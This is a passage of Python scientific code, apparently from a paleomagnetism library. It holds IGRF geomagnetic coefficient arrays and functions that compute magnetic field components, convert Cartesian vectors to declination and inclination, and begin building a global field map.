-1662, 2997, -2016, 1594, 114, 1297, -2038, -404, 1292, 240, 856, -165, 957, 804, 148, 479, -269, -390, 13, 252, -269, -219, 358, 19, 254, 128, -31, -126, -157, -97, -62, 81, 45, 61, -11, 8, 100, -228, 68, 4, -32, 1, -8, -111, -7, 75, -57, -61, 4, -27, 13, -2, -26, 6, -6, 26, 13, -23, 1, -12, 13, 5, 7, -4, -12, -14, 9, 0, -16, 8, 4, -1, 24, 11, -3, 4, -17, 8, 10, -22, 2, 15, -13, 7, 10, -4, -1, -5, -1, 10, 5, 10, 1, -4, -2, 1, -2, -3, 2, 2, 1, -5, 2, -2, 6, 4, -4, 4, 0, 0, -2, 2, 3, 2, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30220, -2068, 5737, -1781, 3000, -2047, 1611, 25, 1287, -2091, -366, 1278, 251, 838, -196, 952, 800, 167, 461, -266, -395, 26, 234, -279, -216, 359, 26, 262, 139, -42, -139, -160, -91, -56, 83, 43, 64, -12, 15, 100, -212, 72, 2, -37, 3, -6, -112, 1, 72, -57, -70, 1, -27, 14, -4, -22, 8, -2, 23, 13, -23, -2, -11, 14, 6, 7, -2, -15, -13, 6, -3, -17, 5, 6, 0, 21, 11, -6, 3, -16, 8, 10, -21, 2, 16, -12, 6, 10, -4, -1, -5, 0, 10, 3, 11, 1, -2, -1, 1, -3, -3, 1, 2, 1, -5, 3, -1, 4, 6, -4, 4, 0, 1, -1, 0, 3, 3, 1, -1, -4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-30100, -2013, 5675, -1902, 3010, -2067, 1632, -68, 1276, -2144, -333, 1260, 262, 830, -223, 946, 791, 191, 438, -265, -405, 39, 216, -288, -218, 356, 31, 264, 148, -59, -152, -159, -83, -49, 88, 45, 66, -13, 28, 99, -198, 75, 1, -41, 6, -4, -111, 11, 71, -56, -77, 1, -26, 16, -5, -14, 10, 0, 22, 12, -23, -5, -12, 14, 6, 6, -1, -16, -12, 4, -8, -19, 4, 6, 0, 18, 10, -10, 1, -17, 7, 10, -21, 2, 16, -12, 7, 10, -4, -1, -5, -1, 10, 4, 11, 1, -3, -2, 1, -3, -3, 1, 2, 1, -5, 3, -2, 4, 5, -4, 4, -1, 1, -1, 0, 3, 3, 1, -1, -5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29992, -1956, 5604, -1997, 3027, -2129, 1663, -200, 1281, -2180, -336, 1251, 271, 833, -252, 938, 782, 212, 398, -257, -419, 53, 199, -297, -218, 357, 46, 261, 150, -74, -151, -162, -78, -48, 92, 48, 66, -15, 42, 93, -192, 71, 4, -43, 14, -2, -108, 17, 72, -59, -82, 2, -27, 21, -5, -12, 16, 1, 18, 11, -23, -2, -10, 18, 6, 7, 0, -18, -11, 4, -7, -22, 4, 9, 3, 16, 6, -13, -1, -15, 5, 10, -21, 1, 16, -12, 9, 9, -5, -3, -6, -1, 9, 7, 10, 2, -6, -5, 2, -4, -4, 1, 2, 0, -5, 3, -2, 6, 5, -4, 3, 0, 1, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29873, -1905, 5500, -2072, 3044, -2197, 1687, -306, 1296, -2208, -310, 1247, 284, 829, -297, 936, 780, 232, 361, -249, -424, 69, 170, -297, -214, 355, 47, 253, 150, -93, -154, -164, -75, -46, 95, 53, 65, -16, 51, 88, -185, 69, 4, -48, 16, -1, -102, 21, 74, -62, -83, 3, -27, 24, -2, -6, 20, 4, 17, 10, -23, 0, -7, 21, 6, 8, 0, -19, -11, 5, -9, -23, 4, 11, 4, 14, 4, -15, -4, -11, 5, 10, -21, 1, 15, -12, 9, 9, -6, -3, -6, -1, 9, 7, 9, 1, -7, -5, 2, -4, -4, 1, 3, 0, -5, 3, -2, 6, 5, -4, 3, 0, 1, -1, 2, 4, 3, 0, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29775, -1848, 5406, -2131, 3059, -2279, 1686, -373, 1314, -2239, -284, 1248, 293, 802, -352, 939, 780, 247, 325, -240, -423, 84, 141, -299, -214, 353, 46, 245, 154, -109, -153, -165, -69, -36, 97, 61, 65, -16, 59, 82, -178, 69, 3, -52, 18, 1, -96, 24, 77, -64, -80, 2, -26, 26, 0, -1, 21, 5, 17, 9, -23, 0, -4, 23, 5, 10, -1, -19, -10, 6, -12, -22, 3, 12, 4, 12, 2, -16, -6, -10, 4, 9, -20, 1, 15, -12, 11, 9, -7, -4, -7, -2, 9, 7, 8, 1, -7, -6, 2, -3, -4, 2, 2, 1, -5, 3, -2, 6, 4, -4, 3, 0, 1, -2, 3, 3, 3, -1, 0, -6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29692, -1784, 5306, -2200, 3070, -2366, 1681, -413, 1335, -2267, -262, 1249, 302, 759, -427, 940, 780, 262, 290, -236, -418, 97, 122, -306, -214, 352, 46, 235, 165, -118, -143, -166, -55, -17, 107, 68, 67, -17, 68, 72, -170, 67, -1, -58, 19, 1, -93, 36, 77, -72, -69, 1, -25, 28, 4, 5, 24, 4, 17, 8, -24, -2, -6, 25, 6, 11, -6, -21, -9, 8, -14, -23, 9, 15, 6, 11, -5, -16, -7, -4, 4, 9, -20, 3, 15, -10, 12, 8, -6, -8, -8, -1, 8, 10, 5, -2, -8, -8, 3, -3, -6, 1, 2, 0, -4, 4, -1, 5, 4, -5, 2, -1, 2, -2, 5, 1, 1, -2, 0, -7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [-29619.400000000001, -1728.2, 5186.1000000000004, -2267.6999999999998, 3068.4000000000001, -2481.5999999999999, 1670.9000000000001, -458.0, 1339.5999999999999, -2288.0, -227.59999999999999, 1252.0999999999999, 293.39999999999998, 714.5, -491.10000000000002, 932.29999999999995, 786.79999999999995, 272.60000000000002, 250.0, -231.90000000000001, -403.0, 119.8, 111.3, -303.80000000000001, -218.80000000000001, 351.39999999999998, 43.799999999999997, 222.30000000000001, 171.90000000000001, -130.40000000000001, -133.09999999999999, -168.59999999999999, -39.299999999999997, -12.9, 106.3, 72.299999999999997, 68.200000000000003, -17.399999999999999, 74.200000000000003, 63.700000000000003, -160.90000000000001, 65.099999999999994, -5.9000000000000004, -61.200000000000003, 16.899999999999999, 0.69999999999999996, -90.400000000000006, 43.799999999999997, 79.0, -74.0, -64.599999999999994, 0.0, -24.199999999999999, 33.299999999999997, 6.2000000000000002, 9.0999999999999996, 24.0, 6.9000000000000004, 14.800000000000001, 7.2999999999999998, -25.399999999999999, -1.2, -5.7999999999999998, 24.399999999999999, 6.5999999999999996, 11.9, -9.1999999999999993, -21.5, -7.9000000000000004, 8.5, -16.600000000000001, -21.5, 9.0999999999999996, 15.5, 7.0, 8.9000000000000004, -7.9000000000000004, -14.9, -7.0, -2.1000000000000001, 5.0, 9.4000000000000004, -19.699999999999999, 3.0, 13.4, -8.4000000000000004, 12.5, 6.2999999999999998, -6.2000000000000002, -8.9000000000000004, -8.4000000000000004, -1.5, 8.4000000000000004, 9.3000000000000007, 3.7999999999999998, -4.2999999999999998, -8.1999999999999993, -8.1999999999999993, 4.7999999999999998, -2.6000000000000001, -6.0, 1.7, 1.7, 0.0, -3.1000000000000001, 4.0, -0.5, 4.9000000000000004, 3.7000000000000002, -5.9000000000000004, 1.0, -1.2, 2.0, -2.8999999999999999, 4.2000000000000002, 0.20000000000000001, 0.29999999999999999, -2.2000000000000002, -1.1000000000000001, -7.4000000000000004, 2.7000000000000002, -1.7, 0.10000000000000001, -1.8999999999999999, 1.3, 1.5, -0.90000000000000002, -0.10000000000000001, -2.6000000000000001, 0.10000000000000001, 0.90000000000000002, -0.69999999999999996, -0.69999999999999996, 0.69999999999999996, -2.7999999999999998, 1.7, -0.90000000000000002, 0.10000000000000001, -1.2, 1.2, -1.8999999999999999, 4.0, -0.90000000000000002, -2.2000000000000002, -0.29999999999999999, -0.40000000000000002, 0.20000000000000001, 0.29999999999999999, 0.90000000000000002, 2.5, -0.20000000000000001, -2.6000000000000001, 0.90000000000000002, 0.69999999999999996, -0.5, 0.29999999999999999, 0.29999999999999999, 0.0, -0.29999999999999999, 0.0, -0.40000000000000002, 0.29999999999999999, -0.10000000000000001, -0.90000000000000002, -0.20000000000000001, -0.40000000000000002, -0.40000000000000002, 0.80000000000000004, -0.20000000000000001, -0.90000000000000002, -0.90000000000000002, 0.29999999999999999, 0.20000000000000001, 0.10000000000000001, 1.8, -0.40000000000000002, -0.40000000000000002, 1.3, -1.0, -0.40000000000000002, -0.10000000000000001, 0.69999999999999996, 0.69999999999999996, -0.40000000000000002, 0.29999999999999999, 0.29999999999999999, 0.59999999999999998, -0.10000000000000001, 0.29999999999999999, 0.40000000000000002, -0.20000000000000001, 0.0, -0.5, 0.10000000000000001, -0.90000000000000002], [-29554.630000000001, -1669.05, 5077.9899999999998, -2337.2399999999998, 3047.6900000000001, -2594.5, 1657.76, -515.42999999999995, 1336.3, -2305.8299999999999, -198.86000000000001, 1246.3900000000001, 269.72000000000003, 672.50999999999999, -524.72000000000003, 920.54999999999995, 797.96000000000004, 282.06999999999999, 210.65000000000001, -225.22999999999999, -379.86000000000001, 145.15000000000001, 100.0, -305.36000000000001, -227.0, 354.41000000000003, 42.719999999999999, 208.94999999999999, 180.25, -136.53999999999999, -123.45, -168.05000000000001, -19.57, -13.550000000000001, 103.84999999999999, 73.599999999999994, 69.560000000000002, -20.329999999999998, 76.739999999999995, 54.75, -151.34, 63.630000000000003, -14.58, -63.530000000000001, 14.58, 0.23999999999999999, -86.359999999999999, 50.939999999999998, 79.879999999999995, -74.459999999999994, -61.140000000000001, -1.6499999999999999, -22.57, 38.729999999999997, 6.8200000000000003, 12.300000000000001, 25.350000000000001, 9.3699999999999992, 10.93, 5.4199999999999999, -26.32, 1.9399999999999999, -4.6399999999999997, 24.800000000000001, 7.6200000000000001, 11.199999999999999, -11.73, -20.879999999999999, -6.8799999999999999, 9.8300000000000001, -18.109999999999999, -19.710000000000001, 10.17, 16.219999999999999, 9.3599999999999994, 7.6100000000000003, -11.25, -12.76, -4.8700000000000001, -0.059999999999999998, 5.5800000000000001, 9.7599999999999998, -20.109999999999999, 3.5800000000000001, 12.69, -6.9400000000000004, 12.67, 5.0099999999999998, -6.7199999999999998, -10.76, -8.1600000000000001, -1.25, 8.0999999999999996, 8.7599999999999998, 2.9199999999999999, -6.6600000000000001, -7.7300000000000004, -9.2200000000000006, 6.0099999999999998, -2.1699999999999999, -6.1200000000000001, 2.1899999999999999, 1.4199999999999999, 0.10000000000000001, -2.3500000000000001, 4.46, -0.14999999999999999, 4.7599999999999998, 3.0600000000000001, -6.5800000000000001, 0.28999999999999998, -1.01, 2.0600000000000001, -3.4700000000000002, 3.77, -0.85999999999999999, -0.20999999999999999, -2.3100000000000001, -2.0899999999999999, -7.9299999999999997, 2.9500000000000002, -1.6000000000000001, 0.26000000000000001, -1.8799999999999999, 1.4399999999999999, 1.4399999999999999, -0.77000000000000002, -0.31, -2.27, 0.28999999999999998, 0.90000000000000002, -0.79000000000000004, -0.57999999999999996, 0.53000000000000003, -2.6899999999999999, 1.8, -1.0800000000000001, 0.16, -1.5800000000000001, 0.95999999999999996, -1.8999999999999999, 3.9900000000000002, -1.3899999999999999, -2.1499999999999999, -0.28999999999999998, -0.55000000000000004, 0.20999999999999999, 0.23000000000000001, 0.89000000000000001, 2.3799999999999999, -0.38, -2.6299999999999999, 0.95999999999999996, 0.60999999999999999, -0.29999999999999999, 0.40000000000000002, 0.46000000000000002, 0.01, -0.34999999999999998, 0.02, -0.35999999999999999, 0.28000000000000003, 0.080000000000000002, -0.87, -0.48999999999999999, -0.34000000000000002, -0.080000000000000002, 0.88, -0.16, -0.88, -0.76000000000000001, 0.29999999999999999, 0.33000000000000002, 0.28000000000000003, 1.72, -0.42999999999999999, -0.54000000000000004, 1.1799999999999999, -1.0700000000000001, -0.37, -0.040000000000000001, 0.75, 0.63, -0.26000000000000001, 0.20999999999999999, 0.34999999999999998, 0.53000000000000003, -0.050000000000000003, 0.38, 0.40999999999999998, -0.22, -0.10000000000000001, -0.56999999999999995, -0.17999999999999999, -0.81999999999999995], [-29496.57, -1586.4200000000001, 4944.2600000000002, -2396.0599999999999, 3026.3400000000001, -2708.54, 1668.1700000000001, -575.73000000000002, 1339.8499999999999, -2326.54, -160.40000000000001, 1232.0999999999999, 251.75, 633.73000000000002, -537.02999999999997, 912.65999999999997, 808.97000000000003, 286.48000000000002, 166.58000000000001, -211.03, -356.82999999999998, 164.46000000000001, 89.400000000000006, -309.72000000000003, -230.87, 357.29000000000002, 44.579999999999998, 200.25999999999999, 189.00999999999999, -141.05000000000001, -118.06, -163.16999999999999, -0.01, -8.0299999999999994, 101.04000000000001, 72.780000000000001, 68.689999999999998, -20.899999999999999, 75.920000000000002, 44.18, -141.40000000000001, 61.539999999999999, -22.829999999999998, -66.260000000000005, 13.1, 3.02, -78.090000000000003, 55.399999999999999, 80.439999999999998, -75.0, -57.799999999999997, -4.5499999999999998, -21.199999999999999, 45.240000000000002, 6.54, 14.0, 24.960000000000001, 10.460000000000001, 7.0300000000000002, 1.6399999999999999, -27.609999999999999, 4.9199999999999999, -3.2799999999999998, 24.41, 8.2100000000000009, 10.84, -14.5, -20.030000000000001, -5.5899999999999999, 11.83, -19.34, -17.41, 11.609999999999999, 16.710000000000001, 10.85, 6.96, -14.050000000000001, -10.74, -3.54, 1.6399999999999999, 5.5, 9.4499999999999993, -20.539999999999999, 3.4500000000000002, 11.51, -5.2699999999999996, 12.75, 3.1299999999999999, -7.1399999999999997, -12.380000000000001, -7.4199999999999999, -0.76000000000000001, 7.9699999999999998, 8.4299999999999997, 2.1400000000000001, -8.4199999999999999, -6.0800000000000001, -10.08, 7.0099999999999998, -1.9399999999999999, -6.2400000000000002, 2.73, 0.89000000000000001, -0.10000000000000001, -1.0700000000000001, 4.71, -0.16, 4.4400000000000004, 2.4500000000000002, -7.2199999999999998, -0.33000000000000002, -0.95999999999999996, 2.1299999999999999, -3.9500000000000002, 3.0899999999999999, -1.99, -1.03, -1.97, -2.7999999999999998, -8.3100000000000005, 3.0499999999999998, -1.48, 0.13, -2.0299999999999998, 1.6699999999999999, 1.6499999999999999, -0.66000000000000003, -0.51000000000000001, -1.76, 0.54000000000000004, 0.84999999999999998, -0.79000000000000004, -0.39000000000000001, 0.37, -2.5099999999999998, 1.79, -1.27, 0.12, -2.1099999999999999, 0.75, -1.9399999999999999, 3.75, -1.8600000000000001, -2.1200000000000001, -0.20999999999999999, -0.87, 0.29999999999999999, 0.27000000000000002, 1.04, 2.1299999999999999, -0.63, -2.4900000000000002, 0.94999999999999996, 0.48999999999999999, -0.11, 0.58999999999999997, 0.52000000000000002, 0.0, -0.39000000000000001, 0.13, -0.37, 0.27000000000000002, 0.20999999999999999, -0.85999999999999999, -0.77000000000000002, -0.23000000000000001, 0.040000000000000001, 0.87, -0.089999999999999997, -0.89000000000000001, -0.87, 0.31, 0.29999999999999999, 0.41999999999999998, 1.6599999999999999, -0.45000000000000001, -0.58999999999999997, 1.0800000000000001, -1.1399999999999999, -0.31, -0.070000000000000007, 0.78000000000000003, 0.54000000000000004, -0.17999999999999999, 0.10000000000000001, 0.38, 0.48999999999999999, 0.02, 0.44, 0.41999999999999998, -0.25, -0.26000000000000001, -0.53000000000000003, -0.26000000000000001, -0.79000000000000004], [-29442.0, -1501.0, 4797.1000000000004, -2445.0999999999999, 3012.9000000000001, -2845.5999999999999, 1676.7, -641.89999999999998, 1350.7, -2352.3000000000002, -115.3, 1225.5999999999999, 244.90000000000001, 582.0, -538.39999999999998, 907.60000000000002, 813.70000000000005, 283.30000000000001, 120.40000000000001, -188.69999999999999, -334.89999999999998, 180.90000000000001, 70.400000000000006, -329.5, -232.59999999999999, 360.10000000000002, 47.299999999999997, 192.40000000000001, 197.0, -140.90000000000001, -119.3, -157.5, 16.0, 4.0999999999999996, 100.2, 70.0, 67.700000000000003, -20.800000000000001, 72.700000000000003, 33.200000000000003, -129.90000000000001, 58.899999999999999, -28.899999999999999, -66.700000000000003, 13.199999999999999, 7.2999999999999998, -70.900000000000006, 62.600000000000001, 81.599999999999994, -76.099999999999994, -54.100000000000001, -6.7999999999999998, -19.5, 51.799999999999997, 5.7000000000000002, 15.0, 24.399999999999999, 9.4000000000000004, 3.3999999999999999, -2.7999999999999998, -27.399999999999999, 6.7999999999999998, -2.2000000000000002, 24.199999999999999, 8.8000000000000007, 10.1, -16.899999999999999, -18.300000000000001, -3.2000000000000002, 13.300000000000001, -20.600000000000001, -14.6, 13.4, 16.199999999999999, 11.699999999999999, 5.7000000000000002, -15.9, -9.0999999999999996, -2.0, 2.1000000000000001, 5.4000000000000004, 8.8000000000000007, -21.600000000000001, 3.1000000000000001, 10.800000000000001, -3.2999999999999998, 11.800000000000001, 0.69999999999999996, -6.7999999999999998, -13.300000000000001, -6.9000000000000004, -0.10000000000000001, 7.7999999999999998, 8.6999999999999993, 1.0, -9.0999999999999996, -4.0, -10.5, 8.4000000000000004, -1.8999999999999999, -6.2999999999999998, 3.2000000000000002, 0.10000000000000001, -0.40000000000000002, 0.5, 4.5999999999999996, -0.5, 4.4000000000000004, 1.8, -7.9000000000000004, -0.69999999999999996, -0.59999999999999998, 2.1000000000000001, -4.2000000000000002, 2.3999999999999999, -2.7999999999999998, -1.8, -1.2, -3.6000000000000001, -8.6999999999999993, 3.1000000000000001, -1.5, -0.10000000000000001, -2.2999999999999998, 2.0, 2.0, -0.69999999999999996, -0.80000000000000004, -1.1000000000000001, 0.59999999999999998, 0.80000000000000004, -0.69999999999999996, -0.20000000000000001, 0.20000000000000001, -2.2000000000000002, 1.7, -1.3999999999999999, -0.20000000000000001, -2.5, 0.40000000000000002, -2.0, 3.5, -2.3999999999999999, -1.8999999999999999, -0.20000000000000001, -1.1000000000000001, 0.40000000000000002, 0.40000000000000002, 1.2, 1.8999999999999999, -0.80000000000000004, -2.2000000000000002, 0.90000000000000002, 0.29999999999999999, 0.10000000000000001, 0.69999999999999996, 0.5, -0.10000000000000001, -0.29999999999999999, 0.29999999999999999, -0.40000000000000002, 0.20000000000000001, 0.20000000000000001, -0.90000000000000002, -0.90000000000000002, -0.10000000000000001, 0.0, 0.69999999999999996, 0.0, -0.90000000000000002, -0.90000000000000002, 0.40000000000000002, 0.40000000000000002, 0.5, 1.6000000000000001, -0.5, -0.5, 1.0, -1.2, -0.20000000000000001, -0.10000000000000001, 0.80000000000000004, 0.40000000000000002, -0.10000000000000001, -0.10000000000000001, 0.29999999999999999, 0.40000000000000002, 0.10000000000000001, 0.5, 0.5, -0.29999999999999999, -0.40000000000000002, -0.40000000000000002, -0.29999999999999999, -0.80000000000000004], [10.300000000000001, 18.100000000000001, -26.600000000000001, -8.6999999999999993, -3.2999999999999998, -27.399999999999999, 2.1000000000000001, -14.1, 3.3999999999999999, -5.5, 8.1999999999999993, -0.69999999999999996, -0.40000000000000002, -10.1, 1.8, -0.69999999999999996, 0.20000000000000001, -1.3, -9.0999999999999996, 5.2999999999999998, 4.0999999999999996, 2.8999999999999999, -4.2999999999999998, -5.2000000000000002, -0.20000000000000001, 0.5, 0.59999999999999998, -1.3, 1.7, -0.10000000000000001, -1.2, 1.3999999999999999, 3.3999999999999999, 3.8999999999999999, 0.0, -0.29999999999999999, -0.10000000000000001, 0.0, -0.69999999999999996, -2.1000000000000001, 2.1000000000000001, -0.69999999999999996, -1.2, 0.20000000000000001, 0.29999999999999999, 0.90000000000000002, 1.6000000000000001, 1.0, 0.29999999999999999, -0.20000000000000001, 0.80000000000000004, -0.5, 0.40000000000000002, 1.3, -0.20000000000000001, 0.10000000000000001, -0.29999999999999999, -0.59999999999999998, -0.59999999999999998, -0.80000000000000004, 0.10000000000000001, 0.20000000000000001, -0.20000000000000001, 0.20000000000000001, 0.0, -0.29999999999999999, -0.59999999999999998, 0.29999999999999999, 0.5, 0.10000000000000001, -0.20000000000000001, 0.5, 0.40000000000000002, -0.20000000000000001, 0.10000000000000001, -0.29999999999999999, -0.40000000000000002, 0.29999999999999999, 0.29999999999999999, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
return models,coeffs
def magsyn(gh,sv,b,date,itype,alt,colat,elong):
"""
# Computes x, y, z, and f for a given date and position, from the
# spherical harmonic coefficients of the International Geomagnetic
# Reference Field (IGRF).
# From Malin and Barraclough (1981), Computers and Geosciences, V.7, 401-405.
#
# Input:
# date = Required date in years and decimals of a year (A.D.)
# itype = 1, if geodetic coordinates are used, 2 if geocentric
# alt = height above mean sea level in km (if itype = 1)
# alt = radial distance from the center of the earth (itype = 2)
# colat = colatitude in degrees (0 to 180)
# elong = east longitude in degrees (0 to 360)
# gh = main field values for date (calc. in igrf subroutine)
# sv = secular variation coefficients (calc. in igrf subroutine)
# begin = date of dgrf (or igrf) field prior to required date
#
# Output:
# x - north component of the magnetic force in nT
# y - east component of the magnetic force in nT
# z - downward component of the magnetic force in nT
# f - total magnetic force in nT
#
# NB: the coordinate system for x,y, and z is the same as that specified
# by itype.
#
# Modified 4/9/97 to use DGRFs from 1945 to 1990 IGRF
# Modified 10/13/06 to use 1995 DGRF, 2005 IGRF and sv coefficient
# for extrapolation beyond 2005. Coefficients from Barton et al. PEPI, 97: 23-26
# (1996), via web site for NOAA, World Data Center A. Modified to use
#degree and
# order 10 as per notes in Malin and Barraclough (1981).
# coefficients for DGRF 1995 and IGRF 2005 are from http://nssdcftp.gsfc.nasa.gov/models/geomagnetic/igrf/fortran_code/
# igrf subroutine calculates
# the proper main field and secular variation coefficients (interpolated between
# dgrf values or extrapolated from 1995 sv values as appropriate).
"""
#
# real gh(120),sv(120),p(66),q(66),cl(10),sl(10)
# real begin,dateq
p=np.zeros((66),'f')
q=np.zeros((66),'f')
cl=np.zeros((10),'f')
sl=np.zeros((10),'f')
begin=b
t = date - begin
r = alt
one = colat*0.0174532925
ct = np.cos(one)
st = np.sin(one)
one = elong*0.0174532925
cl[0] = np.cos(one)
sl[0] = np.sin(one)
x,y,z = 0.0,0.0,0.0
cd,sd = 1.0,0.0
l,ll,m,n = 1,0,1,0
if itype!=2:
#
# if required, convert from geodectic to geocentric
a2 = 40680925.0
b2 = 40408585.0
one = a2 * st * st
two = b2 * ct * ct
three = one + two
rho = np.sqrt(three)
r = np.sqrt(alt*(alt+2.0*rho) + (a2*one+b2*two)/three)
cd = (alt + rho) /r
sd = (a2 - b2) /rho * ct * st /r
one = ct
ct = ct*cd - st*sd
st = st*cd + one*sd
ratio = 6371.2 /r
rr = ratio * ratio
#
# compute Schmidt quasi-normal coefficients p and x(=q)
p[0] = 1.0
p[2] = st
q[0] = 0.0
q[2] = ct
for k in range(1,66):
if n < m: # else go to 2
m = 0
n = n + 1
rr = rr * ratio
fn = n
gn = n - 1
# 2
fm = m
if k != 2: # else go to 4
if m == n: # else go to 3
one = np.sqrt(1.0 - 0.5/fm)
j = k - n - 1
p[k] = one * st * p[j]
q[k] = one * (st*q[j] + ct*p[j])
cl[m-1] = cl[m-2]*cl[0] - sl[m-2]*sl[0]
sl[m-1] = sl[m-2]*cl[0] + cl[m-2]*sl[0]
else:
# 3
gm = m * m
one = np.sqrt(fn*fn - gm)
two = np.sqrt(gn*gn - gm) /one
three = (fn + gn) /one
i = k - n
j = i - n + 1
p[k] = three*ct*p[i] - two*p[j]
q[k] = three*(ct*q[i] - st*p[i]) - two*q[j]
#
# synthesize x, y, and z in geocentric coordinates.
# 4
one = (gh[l-1] + sv[ll+l-1]*t)*rr
if m != 0: # else go to 7
two = (gh[l] + sv[ll+l]*t)*rr
three = one*cl[m-1] + two*sl[m-1]
x = x + three*q[k]
z = z - (fn + 1.0)*three*p[k]
if st != 0.0: # else go to 5
y = y + (one*sl[m-1] - two*cl[m-1])*fm*p[k]/st
else:
# 5
y = y + (one*sl[m-1] - two*cl[m-1])*q[k]*ct
l = l + 2
else:
# 7
x = x + one*q[k]
z = z - (fn + 1.0)*one*p[k]
l = l + 1
m = m + 1
#
# convert to coordinate system specified by itype
one = x
x = x*cd + z*sd
z = z*cd - one*sd
f = np.sqrt(x*x + y*y + z*z)
#
return x,y,z,f
#
def cart2dir(x,y,z):
"""
Converts a direction in cartesian coordinates into declination, inclinations
Parameters
----------
cart : input list of [x,y,z] or list of lists [[x1,y1,z1],[x2,y2,z2]...]
Returns
-------
direction_array : returns an array of [declination, inclination, intensity]
Examples
--------
>>> pmag.cart2dir([0,1,0])
array([ 90., 0., 1.])
"""
B=np.sqrt(x**2+y**2+z**2) # calculate resultant vector length
Dec=np.degrees(np.arctan2(y,x))%360. # calculate declination taking care of correct quadrants (arctan2) and making modulo 360.
Inc=np.degrees(np.arcsin(z/B)) # calculate inclination (converting to degrees) #
return Dec,Inc,B
#
def magMap(date,**kwargs):
"""
generates the data for a map of the magnetic field.
Inputs:
required:
date = decimal year for evaluation (between 1900 and 2020)
optional:
lon_0 = desired zero longitude
Returns:
Bdec = declinations
Binc = inclinations
B = field strength (in microtesla)
lons = array of longitudes
lats = array of latitudes
"""
if 'lon_0' in kwargs.keys(): # check if there are keyword arguments
lon_0=kwargs['lon_0'] # if lon_0 is set, use that one
else: # otherwise.....
lon_0=0. # set the default lon_0 to 0.
incr=10 # we can vary to the resolution of the model
lonmax=(lon_0+180.)%360+incr # get some parameters for our arrays of lat/lon
lonmin=(lon_0-180.)
latmax=90+incr
lons=np.arange(lonmin,lonmax,incr) # make a 1D array of longitudes (like elons)
lats=np.arange(-90,latmax,incr)# make a 1D array of longitudes (like elats)
# set up some containers for the field elements
lenLats, lenLons = len(lats), len(lons)
B=np.zeros((lenLats,lenLons))
Binc=np.zeros((lenLats,lenLons))
Bdec=np.zeros((lenLats,lenLons))
Brad=np.zeros((lenLats,lenLons))
for j in range(lenLats): # step through the latitudes
for i in range(lenLons): # and the longitudes
x,y,z,f=doigrf(lons[i],lats[j],date) # get the field elements
